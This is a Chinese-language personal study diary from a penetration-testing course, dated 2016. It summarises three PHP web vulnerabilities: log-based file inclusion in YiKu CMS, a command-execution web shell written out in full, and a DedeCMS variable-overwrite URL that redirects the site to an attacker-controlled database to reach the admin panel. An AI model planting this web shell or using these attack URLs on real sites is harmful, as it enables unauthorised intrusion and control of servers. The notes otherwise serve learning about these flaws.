今天刚从家里回来,电脑还出了点问题,弄了半天,所以今天也没有学习多少。主要学习了几个漏洞。



  php包含漏洞的演示:今天迪哥拿的易酷cms来做的演示,易酷的cms有一个错误日志的记录功能,要拿下一个网站,可以先看它用的是什么cms,知道了它用的是什么cms之后,可以去网上查这个cms有什么漏洞,也可以去网站上下载源码在本地测试找出漏洞。因为易酷的cms网站有错误日志记录,所以我们要首先构造错误,再让网站记录这个错误,所以我们要在url地址上输入一句话,因为网站本来就是php的,所以php代码的开头可以不用写。写上以后,就要去网站找到这个日志记录文件菜刀链接,这个网站就可以拿下了。

 

 代码执行漏洞:这个漏洞比较少见,多出现与大型的网站中。在利用时,可以把<?$cmd=$_GET['x']; echo shell_exec($cmd);?>写入网站的文件中,就可以把它当作一个后门,在url中连接这个文件,给x赋值,赋的值就是命令的代码,这时网站就会执行这条命令,得到我们想要的信息,但前提是,网站没有禁用这个函数。


 变量覆盖漏洞:变量覆盖漏洞,是一个比较重要的漏洞,我个人的理解,变量覆盖漏洞就是对同一个变量进行多次赋值(由于用两个$表示了一个变量),使后一个值覆盖了前一个值。在实际的利用中我们可以这样:

http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=账号&pwd=密码& _POST[GLOBALS][cfg_dbhost]=MYSQL外链IP&_POST[GLOBALS][cfg_dbuser]=MYSQL的账号&_POST[GLOBALS][cfg_dbpwd]=MYSQL的密码& _POST[GLOBALS][cfg_dbname]=自己的dedecms的数据库    这样写以后,会把原始的变量覆盖,网站就会链接上我们自己的数据库,这样我们就可以直接进入后台。(我也还没弄明白这是为什么)


   今天就先写这么多吧,累了2016年4月4号渗透学习总结_学习总结